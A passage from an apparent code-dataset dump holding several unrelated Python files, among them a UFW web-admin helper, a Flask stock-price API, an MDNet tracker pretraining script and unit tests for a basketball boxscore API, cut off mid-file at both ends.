]\n)\n\nweb.run_app(app, port=os.getenv(\"PORT\", 8080))\n","repo_name":"JoshCLWren/trnscrptr","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26336268058","text":"import time\n\nfrom app import load_setting, save_setting\nfrom app.lib import Ufw, Rule\nfrom app.main.services.rule import RuleService\n\n\ndef ufw_status(ufw: Ufw, expire_time=60):\n now = time.time()\n status = load_setting('ufw_status') # type: dict\n if status is None:\n status = ufw.status(parse_rule=False)\n elif now - status.get('status_time', 0) >= expire_time:\n status.update(**ufw.status(parse_rule=False))\n else:\n return status\n\n status['status_time'] = now\n save_setting('ufw_status', status)\n\n return status\n\n\ndef ufw_sync_rule(ufw: Ufw):\n now = time.time()\n\n service = RuleService()\n for item in service.query.all():\n service.delete_item(item, commit_now=False)\n\n status = ufw.status()\n status['status_time'] = now\n status['rules_time'] = now\n\n rules = status.pop('rules')\n save_setting('ufw_status', status)\n\n for rule in rules: # type: Rule\n service.add_item(commit_now=False, **rule.data)\n\n service.commit()\n","repo_name":"HsOjo/UfwWebAdmin","sub_path":"app/main/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"36568113550","text":"def run(): \r\n n = int(input())\r\n if(n > 10):\r\n print('INVALID INPUT')\r\n else:\r\n dict = {}\r\n for i in range(n):\r\n a = input().split()\r\n dict[a[0]] = a[1]\r\n tong = 0\r\n tich = 1\r\n for i in dict.keys():\r\n if dict[i].isdigit():\r\n tong += int(dict[i])\r\n tich *= int(dict[i])\r\n print(tong, tich)\r\nrun()\r\n\r\n# 4\r\n# a 9\r\n# b 5\r\n# c abc\r\n# d 1\r\n# 6371 ->","repo_name":"HieuAnh87/Python_ptit","sub_path":"Contest/Thi cuối kỳ 11.1.2022/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"768138264","text":"import os\r\nimport shutil\r\n\r\n#ファイル/ディレクトリの存在チェック\r\nprint('ファイル/ディレクトリの存在チェック\\n')\r\n\r\npath = 'sample.py'\r\n\r\nif os.path.exists(path):\r\n print('指定したパスは存在する')\r\n\r\n if os.path.isfile(path):\r\n print('ファイルです')\r\n if os.path.isdir(path):\r\n print('ディレクトリです')\r\nelse:\r\n print('指定したパスは存在しません')\r\n\r\n#ファイル/ディレクトリの作成と削除\r\n#ファイルの削除\r\nprint('\\nファイルの削除\\n')\r\n#os.remove('file1.txt') #なければエラーになる\r\n\r\n#ディレクトリの作成\r\nprint('\\nディレクトリの作成\\n')\r\n\r\nos.mkdir('dir_1')\r\nos.makedirs('dir_2/dir_3')\r\n\r\n#ディレクトリの削除\r\nos.rmdir('dir_1')\r\nos.removedirs('dir_2/dir_3')\r\n\r\n#ファイル/ディレクトリの移動とコピー\r\n#shutil.copy('sample.txt', 'sample2.txt') #単一コピー\r\n#shutil.copytree('dir_1/', 'dir_2/') #ディレクトリごと再帰的にコピー\r\n#なければエラー","repo_name":"maato-origin/PythonPractice","sub_path":"6-2.py","file_name":"6-2.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72107517211","text":"from flask import Flask, request\nimport yfinance as yf\nimport pandas as pd\nfrom datetime import date, timedelta\nimport happystockapi_pb2 as happystock\n\n\napp = Flask(__name__)\n\ndef fetchStockPrices(ticker):\n\n stockPriceList = happystock.listStockPrice()\n\n tickerInfo = yf.Ticker(ticker)\n\n todayDate = date.today() + timedelta(days=1)\n weekAgoDate = date.today() - timedelta(days=8)\n stockHistory = tickerInfo.history(start=weekAgoDate.strftime(\"%Y-%m-%d\"), end=todayDate.strftime(\"%Y-%m-%d\"), interval=\"1d\")\n\n \n for i in range(7):\n day = date.today() - timedelta(days=6-i) \n\n stockItem = stockPriceList.priceList.add()\n stockItem.name = ticker \n stockItem.date.FromDatetime(pd.to_datetime(day))\n\n while day.strftime(\"%Y-%m-%d\") not in stockHistory.index:\n day = day - timedelta(days=1)\n\n dayStockData = stockHistory.loc[day.strftime(\"%Y-%m-%d\")]\n stockItem.price = round(dayStockData['Close'], 2)\n\n return stockPriceList\n\n@app.route(\"/stock_price\", methods=['GET'])\ndef returnStockPrices():\n stockPriceList = {}\n if 'ticker' in request.args: \n ticker = request.args['ticker']\n stockPriceList = fetchStockPrices(ticker)\n headers = {'Access-Control-Allow-Origin': '*'}\n data = stockPriceList.SerializeToString()\n return data, headers\n","repo_name":"alex-he8276/hack-the-stocks","sub_path":"stockPriceApi/stockPrice.py","file_name":"stockPrice.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"32257706058","text":"trees = open(\"input.txt\").read().strip().splitlines()\nvisible, scenic = set(), 0\n\nfor x in range(len(trees)):\n for y in range(len(trees)):\n score = 1\n pos = trees[x][y]\n left = trees[x][:y][::-1]\n right = trees[x][y+1:len(trees)]\n up = [trees[nx][y] for nx in reversed(range(x))]\n down = [trees[nx][y] for nx in range(x+1,len(trees))]\n \n for direction in left, right, up, down:\n for n, neighbour in enumerate(direction):\n if pos <= neighbour:\n score *= n+1; break\n else:\n score *= len(direction) if direction else 1\n visible.add((x,y))\n scenic = max(scenic, score)\n \nprint(\"p1: \",len(visible))\nprint(\"p2: \",{scenic})\n","repo_name":"paulphys/adventofcode","sub_path":"2022/day08/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"18091331976","text":"import tensorflow as tf\nimport numpy as np\nfrom models import MDNet\nimport reader\nimport proc\nimport os\nimport argparse\n\n\nclass Config(object):\n momentum = 0.9\n weight_decay = 0.0005\n lr_rate = 0.0001\n lr_rates = {'conv': 1.0, 'bias': 2.0, 'fc6-conv': 10.0, 'fc6-bias': 20.0}\n\n batch_frames = 8\n batch_size = 128\n batch_pos = 32\n batch_neg = 96\n num_cycle = 100\n\n posPerFrame = 50\n negPerFrame = 200\n scale_factor = 1.05\n input_size = 107\n\n pos_range = [0.7, 1]\n neg_range = [0, 0.5]\n\ndef pretrain_mdnet(datasets, init_model_path, result_dir, load_path=None, shuffle=True, norm=False, dropout=True, regularization=True):\n config = Config()\n\n # print parameters\n print('shuffle', shuffle)\n print('norm', norm)\n print('dropout', dropout)\n print('regularization', regularization)\n print('init_model_path', init_model_path)\n print('result_dir', result_dir)\n\n # create directory\n if not os.path.exists(result_dir):\n os.makedirs(result_dir)\n\n # load sequences\n train_data = reader.read_datasets(datasets)\n K = len(train_data.data)\n\n # create session and saver\n gpu_config = tf.ConfigProto(allow_soft_placement=True)\n sess = tf.InteractiveSession(config=gpu_config)\n\n # load model, weights\n model = MDNet(config)\n model.build_trainer(K, config.batch_size, dropout=dropout, regularization=regularization)\n tf.global_variables_initializer().run()\n model.load(init_model_path,sess)\n sess.run(model.lr_rate.assign(config.lr_rate))\n\n # create saver\n saver = tf.train.Saver([v for v in tf.global_variables() if 'fc6' not in v.name])\n\n # restore from model\n if load_path is not None:\n saver.restore(sess, load_path)\n\n # prepare roidb and frame list\n train_loss_file = open(os.path.join(result_dir, 'train_loss.txt'), 'w')\n n_frames = config.batch_frames*config.num_cycle\n for i in range(config.num_cycle):\n loss_total = 0\n print('###### training cycle '+str(i)+'/'+str(config.num_cycle)+'...') \n\n seq_i = 0\n for seq, seq_data in train_data.data.iteritems():\n print('### training video \"'+seq+'\"...')\n seq_n_frames = len(seq_data.frames)\n \n ## prepare roidb\n print('- preparing roidb...')\n seq_data.rois = proc.seq2roidb(seq_data, config)\n\n ## prepare frame list\n print('- shuffle frames...')\n seq_data.frame_lists = []\n while len(seq_data.frame_lists) < n_frames:\n seq_data.frame_lists = np.r_[seq_data.frame_lists, np.random.permutation(seq_n_frames)]\n seq_data.frame_lists = seq_data.frame_lists[:n_frames]\n\n ## start training\n # extract batch_size frames\n frame_inds = seq_data.frame_lists[config.batch_frames * i: config.batch_frames * (i+1)].astype(np.int)\n\n # sample boxes\n pos_boxes = np.concatenate([seq_data.rois[frame_ind].pos_boxes for frame_ind in frame_inds], axis=0)\n neg_boxes = np.concatenate([seq_data.rois[frame_ind].neg_boxes for frame_ind in frame_inds], axis=0)\n pos_inds = np.random.permutation(config.posPerFrame * config.batch_frames)[:config.batch_pos]\n neg_inds = np.random.permutation(config.negPerFrame * config.batch_frames)[:config.batch_neg]\n \n # pack as boxes, paths\n pos_boxes = pos_boxes[pos_inds]\n neg_boxes = neg_boxes[neg_inds]\n boxes = np.r_[pos_boxes, neg_boxes]\n\n box_relinds = np.r_[pos_inds // config.posPerFrame, neg_inds // config.negPerFrame]\n paths = [seq_data.frames[ind] for ind in frame_inds[box_relinds]]\n gts = np.repeat(np.identity(2), [config.batch_pos, config.batch_neg], axis=0)\n patches = proc.load_patch(paths, boxes, norm=False)\n\n # shuffle\n if shuffle:\n inds = np.random.permutation(config.batch_size)\n patches = patches[inds]\n gts = gts[inds]\n\n # training\n _, loss, score, weight, bias = sess.run([model.trainable[seq_i],\n model.losses['loss-'+str(seq_i)],\n model.layers['fc6-'+str(seq_i)],\n model.weights['fc6-'+str(seq_i)],\n model.biases['fc6-'+str(seq_i)]],\n feed_dict={model.layers['input']: patches,\n model.layers['y-'+str(seq_i)]: gts})\n print(seq_i)\n print(score.reshape(-1, 2)[:5])\n print(gts[:5])\n print(np.mean(loss))\n print(weight)\n print(bias)\n loss_total += np.mean(loss)\n\n # update seq_i\n seq_i += 1\n\n ## save the model\n train_loss_file.write('Epoch '+str(i)+', Loss: '+str(np.mean(loss)))\n saver.save(sess, os.path.join(result_dir, 'model_e'+str(i)+'.ckpt'), global_step=i+1)\n train_loss_file.close()\n\ndef get_params():\n parser = argparse.ArgumentParser()\n parser.add_argument('--no_shuffle', action='store_true', help='disable shuffling frames')\n parser.add_argument('--norm', action='store_true', help='normalize input image')\n parser.add_argument('--no_dropout', action='store_true', help='disable dropout')\n parser.add_argument('--no_regularization', action='store_true', help='disable regularization')\n parser.add_argument('--result_dir', help='places to store the pretrained model')\n parser.add_argument('--dataset', choices=['otb', 'vot', 'otb_vot'], help='choose pretrained dataset: [vot/otb/otb_vot]')\n parser.add_argument('--init_model_path', help='initial model path')\n parser.add_argument('--load_path', default=None, help='initial model path')\n return parser.parse_args()\n\ndef main():\n params = get_params()\n if params.dataset == 'otb':\n datasets = ['otb']\n elif params.dataset == 'vot':\n datasets = ['vot2013', 'vot2014', 'vot2015']\n elif params.dataset == 'otb_vot':\n datasets = ['otb', 'vot2013', 'vot2014', 'vot2015']\n\n pretrain_mdnet(datasets, load_path=params.load_path, init_model_path=params.init_model_path, result_dir=params.result_dir,\n shuffle=(not params.no_shuffle), norm=params.norm, dropout=(not params.no_dropout), regularization=(not params.no_regularization))\n\nif __name__ == '__main__':\n main()\n","repo_name":"zhyj3038/PyMDNet","sub_path":"pretrain.py","file_name":"pretrain.py","file_ext":"py","file_size_in_byte":6124,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"32"} +{"seq_id":"42465007897","text":"import unittest\nimport json\n\nfrom app import create_app_test\nfrom app.db_models import db\nfrom app.services.logger import getLogger\nfrom provisioning import complete_provisioning\n\nURL = '/api/boxscores/'\n\n\nclass TestBoxscore(unittest.TestCase):\n def setUp(self):\n app = create_app_test()\n self.app = app\n\n db.init_app(app)\n db.app = app\n with self.app.app_context():\n db.drop_all()\n db.create_all()\n complete_provisioning(db)\n self.app = app.test_client()\n\n\nclass AllBoxscoresTestCase(TestBoxscore):\n \"\"\"\n Test getting all boxscores at given date\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + '2019/2/18')\n assert r.status_code == 200\n assert len(r.json) == 2\n assert r.json['status'] == 'OK'\n assert len(r.json['data']) == 2\n assert r.json['data'][0] == {'player': {'id': 1, 'team': 1, 'first_name': 'Daryl', 'last_name': 'Watkins'}, 'game': 1,\n 'min': '12:34', 'dnp': False, 'pts': 21, 'reb': 10, 'ast': 15, 'stl': 1, 'blk': 3, 'to': 0,\n 'fga': 10, 'fgm': 7, 'tpa': 2, 'tpm': 2, 'fta': 4, 'ftm': 1, 'ttfl_score': 54}\n assert r.json['data'][1] == {'player': {'id': 2, 'team': 1, 'first_name': 'Alexis', 'last_name': 'Ajinça'}, 'game': 1,\n 'min': '22:45', 'dnp': False, 'pts': 0, 'reb': 0, 'ast': 0, 'stl': 0, 'blk': 0, 'to': 2,\n 'fga': 10, 'fgm': 0, 'tpa': 2, 'tpm': 0, 'fta': 4, 'ftm': 0, 'ttfl_score': -18}\n\n\nclass AllBoxscoresInvalidDateTestCase(TestBoxscore):\n \"\"\"\n Test getting boxscores with invalid date\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + '2019/32/18')\n assert r.status_code == 404\n assert len(r.json) == 2\n assert r.json['status'] == 'error'\n assert r.json['message'] == 'Invalid date'\n\n\nclass AllBoxscoresDateFutureTestCase(TestBoxscore):\n \"\"\"\n Test getting boxscores with date in the future\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + '9999/2/18')\n assert r.status_code == 404\n assert len(r.json) == 2\n assert r.json['status'] == 'error'\n assert r.json['message'] == 'Date in the future'\n\n\nclass AllPlayerBoxscoresTestCase(TestBoxscore):\n \"\"\"\n Test getting all player's boxscores\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + 'player/1')\n assert r.status_code == 200\n assert len(r.json) == 2\n assert r.json['status'] == 'OK'\n assert len(r.json['data']) == 2\n assert r.json['data'][0] == {'player': 1, 'game': 1, 'min': '12:34', 'dnp': False, 'pts': 21, 'reb': 10, 'ast': 15, 'stl': 1,\n 'blk': 3, 'to': 0, 'fga': 10, 'fgm': 7, 'tpa': 2, 'tpm': 2, 'fta': 4, 'ftm': 1, 'ttfl_score': 54}\n assert r.json['data'][1] == {'player': 1, 'game': 2, 'min': '48:00', 'dnp': False, 'pts': 4, 'reb': 0, 'ast': 18, 'stl': 2,\n 'blk': 0, 'to': 4, 'fga': 16, 'fgm': 7, 'tpa': 3, 'tpm': 2, 'fta': 8, 'ftm': 7, 'ttfl_score': 25}\n\n\nclass AllPlayerBoxscoresNotFoundTestCase(TestBoxscore):\n \"\"\"\n Test getting unknown player's boxscores\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + 'player/0')\n assert r.status_code == 404\n assert len(r.json) == 2\n assert r.json['status'] == 'error'\n assert r.json['message'] == 'Could not get boxscores'\n\n\nclass PlayerNightBoxscoreTestCase(TestBoxscore):\n \"\"\"\n Test getting player boxscore at given date\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + 'player/1/2019/2/18')\n assert r.status_code == 200\n assert len(r.json) == 2\n assert r.json['status'] == 'OK'\n assert r.json['data'] == {'player': 1, 'game': 1, 'min': '12:34', 'dnp': False, 'pts': 21, 'reb': 10, 'ast': 15, 'stl': 1,\n 'blk': 3, 'to': 0, 'fga': 10, 'fgm': 7, 'tpa': 2, 'tpm': 2, 'fta': 4, 'ftm': 1, 'ttfl_score': 54}\n\n\nclass PlayerNightBoxscoreInvalidDateTestCase(TestBoxscore):\n \"\"\"\n Test getting player night boxscore with invalid date\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + 'player/1/2019/32/18')\n assert r.status_code == 404\n assert len(r.json) == 2\n assert r.json['status'] == 'error'\n assert r.json['message'] == 'Invalid date'\n\n\nclass PlayerNightBoxscoreDateFutureTestCase(TestBoxscore):\n \"\"\"\n Test getting player night boxscore with date in the future\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + 'player/1/9999/2/18')\n assert r.status_code == 404\n assert len(r.json) == 2\n assert r.json['status'] == 'error'\n assert r.json['message'] == 'Date in the future'\n\n\nclass PlayerNightBoxscoreNotFoundTestCase(TestBoxscore):\n \"\"\"\n Test getting unknown player's night boxscore\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + 'player/0/2019/2/18')\n assert r.status_code == 404\n assert len(r.json) == 2\n assert r.json['status'] == 'error'\n assert r.json['message'] == 'Could not get boxscore'\n\n\nclass TopTTFLTestCase(TestBoxscore):\n \"\"\"\n Test getting top ttfl scores at given date\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + 'topttfl/2019/2/18')\n assert r.status_code == 200\n assert len(r.json) == 2\n assert r.json['status'] == 'OK'\n assert len(r.json['data']) == 2\n assert r.json['data'][0] == {\n 'ttfl_score': 54, 'player_id': 1, 'first_name': 'Daryl', 'last_name': 'Watkins'}\n assert r.json['data'][1] == {\n 'ttfl_score': -18, 'player_id': 2, 'first_name': 'Alexis', 'last_name': 'Ajinça'}\n\n\nclass TopTTFLInvalidDateTestCase(TestBoxscore):\n \"\"\"\n Test getting top ttfl scores with invalid date\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + 'topttfl/2019/32/18')\n assert r.status_code == 404\n assert len(r.json) == 2\n assert r.json['status'] == 'error'\n assert r.json['message'] == 'Invalid date'\n\n\nclass TopTTFLDateFutureTestCase(TestBoxscore):\n \"\"\"\n Test getting top ttfl scores with date in the future\n \"\"\"\n\n def runTest(self):\n r = self.app.get(URL + 'topttfl/9999/2/18')\n assert r.status_code == 404\n assert len(r.json) == 2\n assert r.json['status'] == 'error'\n assert r.json['message'] == 'Date in the future'\n\n\ndef suite():\n suite = unittest.TestSuite()\n suite.addTests(\n [unittest.makeSuite(AllBoxscoresTestCase, 'all_boxscores'),\n unittest.makeSuite(AllBoxscoresInvalidDateTestCase,\n 'all_boxscores_invalid_date'),\n unittest.makeSuite(AllBoxscoresDateFutureTestCase,\n 'all_boxscores_date_future'),\n unittest.makeSuite(AllPlayerBoxscoresTestCase,\n 'all_player_boxscores'),\n unittest.makeSuite(AllPlayerBoxscoresNotFoundTestCase,\n 'all_player_boxscores_not_found'),\n unittest.makeSuite(PlayerNightBoxscoreTestCase,\n 'player_night_boxscore'),\n unittest.makeSuite(PlayerNightBoxscoreInvalidDateTestCase,\n 'player_night_boxscore_invalid_date'),\n unittest.makeSuite(PlayerNightBoxscoreDateFutureTestCase,\n 'player_night_boxscore_date_future'),\n unittest.makeSuite(PlayerNightBoxscoreNotFoundTestCase,\n 'player_night_boxscore_not_found'),\n unittest.makeSuite(TopTTFLTestCase, 'top_ttfl'),\n unittest.makeSuite(TopTTFLInvalidDateTestCase,\n 'top_ttfl_invalid_date'),\n unittest.makeSuite(TopTTFLDateFutureTestCase, 'top_ttfl_date_future')]\n )\n return suite\n","repo_name":"Bobbyberu/TTFL-Dashboard","sub_path":"back/src/unit_test/test_boxscore.py","file_name":"test_boxscore.py","file_ext":"py","file_size_in_byte":7913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"1882279676","text":"import sys,time,os\nimport numpy as np\nimport torch\nfrom copy import deepcopy\nimport utils\nfrom utils import *\nsys.path.append('..')\nfrom arguments import get_args\nimport torch.nn.functional as F\nimport torch.nn as nn\nfrom tqdm import tqdm\nargs = get_args()\n\nclass Appr(object):\n def __init__(self,model,nepochs=100,sbatch=256,lr=0.001,lr_min=1e-6,lr_factor=3,lr_patience=5,clipgrad=100,args=None,log_name = None, use_sigmoid=False):\n self.model=model\n self.model_old=model\n self.fisher=None\n\n self.nepochs = nepochs\n self.sbatch = sbatch\n self.lr = lr\n self.lr_min = lr_min * 1/3\n self.lr_factor = lr_factor\n self.lr_patience = lr_patience\n self.clipgrad = clipgrad\n\n self.lamb = args.lamb\n self.lamb_kld = args.lamb_kld\n self.lamb_af = args.lamb_af\n\n self.use_sigmoid = use_sigmoid\n self.model.s_gate = args.s_gate\n\n self.ce=torch.nn.CrossEntropyLoss()\n self.optimizer=self._get_optimizer()\n \n self.omega = {}\n for n,_ in self.model.named_parameters():\n self.omega[n] = 0\n\n if 'cifar' in args.approach:\n self.kld = KLD_adapt()\n else:\n self.kld = KLD()\n\n self.mcl = args.mcl\n self.adapt_af = True\n self.adapt_kld = True\n\n return\n\n def _get_optimizer(self,lr=None):\n if lr is None: lr=self.lr\n optimizer = torch.optim.Adam(self.model.parameters(), lr=lr)\n return optimizer\n\n def train(self, t, xtrain, ytrain, xvalid, yvalid, data, input_size, taskcla):\n\n #initialization of adaptor\n self.model.adaptor = nn.init.normal_(nn.Parameter(torch.ones((14, self.model.nLearner))))\n self.model.adaptor_kld = nn.init.normal_(nn.Parameter(torch.ones((self.model.nLearner, self.model.nLearner))))\n\n # if using the same initialization for each learner\n if self.mcl != 'mcl-h':\n #if self.same_init:\n if t == 0:\n print(\"Same Random Initialization\")\n weight_id = 0\n weight_num = 14\n init_exp = []\n for n, p in self.model.named_parameters():\n if 'last' not in n and 'adaptor' not in n:\n if weight_id < weight_num:\n init_exp.append(p.data.clone().detach())\n else:\n p.data = init_exp[weight_id % weight_num]\n weight_id += 1\n\n best_loss = np.inf\n best_model = utils.get_model(self.model)\n lr = self.lr\n self.optimizer = self._get_optimizer(lr)\n \n # Loop epochs\n for e in range(self.nepochs):\n # Train\n clock0=time.time()\n num_batch = xtrain.size(0)\n \n self.train_epoch(t,xtrain,ytrain)\n \n clock1=time.time()\n train_loss,train_acc=self.eval(t,xtrain,ytrain)\n clock2=time.time()\n print('| Epoch {:3d}, time={:5.1f}ms/{:5.1f}ms | Train: loss={:.3f}, acc={:5.1f}% |'.format(\n e+1,1000*self.sbatch*(clock1-clock0)/num_batch,\n 1000*self.sbatch*(clock2-clock1)/num_batch,train_loss,100*train_acc),end='')\n # Valid\n valid_loss,valid_acc=self.eval(t,xvalid,yvalid)\n print(' Valid: loss={:.3f}, acc={:5.1f}% |'.format(valid_loss,100*valid_acc),end='')\n print(' lr : {:.6f}'.format(self.optimizer.param_groups[0]['lr']))\n #save log for current task & old tasks at every epoch\n\n # Adapt lr\n if valid_loss < best_loss:\n best_loss = valid_loss\n best_model = utils.get_model(self.model)\n patience = self.lr_patience\n print(' *', end='')\n\n else:\n patience -= 1\n if patience <= 0:\n lr /= self.lr_factor\n print(' lr={:.1e}'.format(lr), end='')\n if lr < self.lr_min:\n print()\n patience = self.lr_patience\n self.optimizer = self._get_optimizer(lr)\n print()\n\n # Restore best\n utils.set_model_(self.model, best_model)\n\n if self.use_sigmoid:\n task = torch.autograd.Variable(torch.LongTensor([t]).cuda())\n mask = self.model.mask(task, s=self.model.s_gate)\n for i in range(len(mask)):\n mask[i] = torch.autograd.Variable(mask[i].data.clone(), requires_grad=False)\n\n self.old_param = {}\n for n, p in self.model.named_parameters():\n self.old_param[n] = p.data.clone().detach()\n\n self.omega_update(t,xtrain)\n \n return\n\n def train_epoch(self,t,x,y):\n self.model.train()\n\n r=np.arange(x.size(0))\n np.random.shuffle(r)\n r=torch.LongTensor(r).cuda()\n\n # Loop batches\n for i in range(0,len(r),self.sbatch):\n if i+self.sbatch<=len(r): b=r[i:i+self.sbatch]\n else: b=r[i:]\n images=x[b]\n targets=y[b]\n \n # Forward current model\n task = torch.autograd.Variable(torch.LongTensor([t]).cuda())\n outputs, outputs_expert, feature_expert = self.model.forward(images, task, return_expert=True)\n\n loss = self.criterion(t, outputs, targets) + self.lamb_kld * self.kld(outputs_expert, t, self.model)\n\n # Backward\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n return\n\n def eval(self,t,x,y):\n total_loss=0\n total_acc=0\n total_num=0\n self.model.eval()\n\n r = np.arange(x.size(0))\n r = torch.LongTensor(r).cuda()\n\n # Loop batches\n for i in range(0,len(r),self.sbatch):\n if i+self.sbatch<=len(r): b=r[i:i+self.sbatch]\n else: b=r[i:]\n images=x[b]\n targets=y[b]\n\n # Forward\n task = torch.autograd.Variable(torch.LongTensor([t]).cuda())\n outputs = self.model.forward(images, task)\n\n loss = self.criterion(t,outputs,targets)\n\n _,pred=outputs.max(1)\n hits=(pred==targets).float()\n\n # Log\n total_loss+=loss.data.cpu().numpy()*len(b)\n total_acc+=hits.sum().data.cpu().numpy()\n total_num+=len(b)\n\n return total_loss/total_num,total_acc/total_num\n\n def criterion(self, t, output, targets):\n # Regularization for all previous tasks\n loss_reg = 0\n loss_af = 0\n weight_id = 0\n weight_num = 14\n\n if t > 0:\n for name, param in self.model.named_parameters():\n if 'last' not in name and 'adaptor' not in name:\n loss_reg += torch.sum(self.omega[name] * (self.old_param[name] - param).pow(2)) / 2\n if 'efc' not in name:\n if self.adapt_af:\n if 'last' not in name and 'adaptor' not in name:\n softmax_adaptor = self.model.nLearner * F.softmax(self.model.adaptor[weight_id % weight_num])\n loss_af += softmax_adaptor[weight_id // weight_num] * torch.sum(param.pow(2)) / 2\n weight_id += 1\n elif 'last' in name: #shared output head\n loss_af += torch.sum(param.pow(2)) / 2\n else:\n loss_af += torch.sum(param.pow(2)) / 2\n\n return self.ce(output, targets) + self.lamb * loss_reg + self.lamb_af * loss_af\n \n def omega_update(self,t,x):\n sbatch = 20\n \n # Compute\n self.model.train()\n for i in tqdm(range(0,x.size(0),sbatch),desc='Omega',ncols=100,ascii=True):\n b=torch.LongTensor(np.arange(i,np.min([i+sbatch,x.size(0)]))).cuda()\n images = x[b]\n # Forward and backward\n self.model.zero_grad()\n\n task = torch.autograd.Variable(torch.LongTensor([t]).cuda())\n # Forward\n outputs = self.model.forward(images, task)\n\n # Sum of L2 norm of output scores\n loss = torch.sum(outputs.norm(2, dim = -1))\n\n loss.backward()\n\n # Get gradients\n for n,p in self.model.named_parameters():\n if p.grad is not None and 'adaptor' not in n:\n self.omega[n]+= p.grad.data.abs() / x.size(0)\n\n return","repo_name":"lywang3081/CAF","sub_path":"approaches/mas_caf.py","file_name":"mas_caf.py","file_ext":"py","file_size_in_byte":8574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"5162062355","text":"# This script contains the base class of all examProject classes, and some\r\n# auxiliary methods.\r\n\r\nimport os\r\nimport copy\r\nimport shutil\r\nimport glob\r\nimport _pickle as pickle\r\nfrom datetime import datetime\r\nfrom babel.dates import format_date\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\nimport csv\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom scipy.io import savemat\r\n\r\n\r\ndef addSlash(p):\r\n \"\"\"\r\n If string p does not end with character '/', it is added.\r\n \"\"\"\r\n if p.endswith('/'):\r\n return p\r\n else:\r\n return p + '/'\r\n\r\n\r\ndef removeSlash(p):\r\n \"\"\"\r\n If string p does not end with character '/', it is added.\r\n \"\"\"\r\n if p.endswith('/'):\r\n return p[:-1]\r\n else:\r\n return p\r\n\r\n\r\ndef getItems(x, z, n):\r\n \"\"\"\r\n Takes n elements at random from list x without replacement (if possible).\r\n\r\n If the list x has less than n items, it is replicated as many times as\r\n necessary.\r\n\r\n All items in x that are in z must be selected.\r\n \"\"\"\r\n\r\n # Input data sizes\r\n n_items = len(x)\r\n n_batch = np.ceil(float(n)/n_items).astype(int)\r\n\r\n # Shuffle elements of the original list, so as to randomize the item\r\n # selection.\r\n y = copy.copy(x)\r\n np.random.shuffle(y)\r\n\r\n # If n_items< n, we need to replicate the shuffled list up to get more than\r\n # n elements.\r\n y = np.tile(y, n_batch)\r\n y = y[0:n]\r\n\r\n # Re-shuffle to avoid periodicities\r\n np.random.shuffle(y)\r\n\r\n # If n>n_items, the mandatory items in z have been necessarily selected.\r\n # Otherwise, we have forze selection.\r\n if n < n_items:\r\n\r\n # We have to insert the mandatory items, but maybe some of them are\r\n # are already in the list, so we proceed in three steps:\r\n # 1. Remove items of z not in x, because the cannot be inserted.\r\n # WARNING: do not use z = list(set(z).intersection(x))\r\n # because it affects to the random sequence generator\r\n z = [item for item in z if item in x]\r\n if len(z) > n:\r\n z = z[0:n] # No more than n mandatory items can be included...\r\n # 2. Remove items of y that are in z (they will be added again later).\r\n # WARNING: do not use y = list(set(y).difference(z))\r\n # because it affects to the random sequence generator\r\n y = [item for item in y if item not in z]\r\n # 3. Remove some more items to free space for z.\r\n y = y[0:n-len(z)]\r\n # 4. Insert z\r\n y = y + z\r\n # 4. Reshuffle again to randomize the position of the mandatory tests.\r\n np.random.shuffle(y)\r\n\r\n return y\r\n\r\n\r\nclass ExamProject(object):\r\n \"\"\"\r\n Exam is the general class encompassing all components of an evaluation\r\n project\r\n \"\"\"\r\n\r\n def __init__(self, project_path):\r\n\r\n # This is the minimal information required to work with a project\r\n self.project_path = addSlash(project_path)\r\n self.state = self.project_path + 'state/'\r\n self.metadata = self.state + 'metadata.pkl'\r\n\r\n def create(self, f_struct, exam_class=None):\r\n \"\"\"\r\n Creates a new exam project. To do so, it defines the main folder\r\n structure, and creates (or cleans) the project folder, specified in\r\n self.project_path\r\n \"\"\"\r\n\r\n # Default project folders\r\n self.exam_class = exam_class\r\n self.f_struct = {\r\n 'class_list': self.project_path + 'class_list/',\r\n 'data4students': self.project_path + 'data4students/',\r\n 'exam_statement': self.project_path + 'exam_statement/',\r\n 'student_results': self.project_path + 'student_results/',\r\n 'eval_results': self.project_path + 'eval_results/',\r\n 'db_questions': self.project_path + 'dbFiltering/',\r\n 'all_students': self.state + 'all_students.csv',\r\n 'basename': 'Ex_',\r\n 'student_notes_fname': 'student_notes.xlsx'}\r\n\r\n # Change default names by those specified in f_struct\r\n for s, v in f_struct.items():\r\n self.f_struct[s] = v\r\n\r\n # Add default subfolders\r\n if 'figq_path' not in self.f_struct:\r\n self.f_struct['figq_path'] = (self.f_struct['db_questions'] +\r\n 'figs/')\r\n if 'template_path' not in 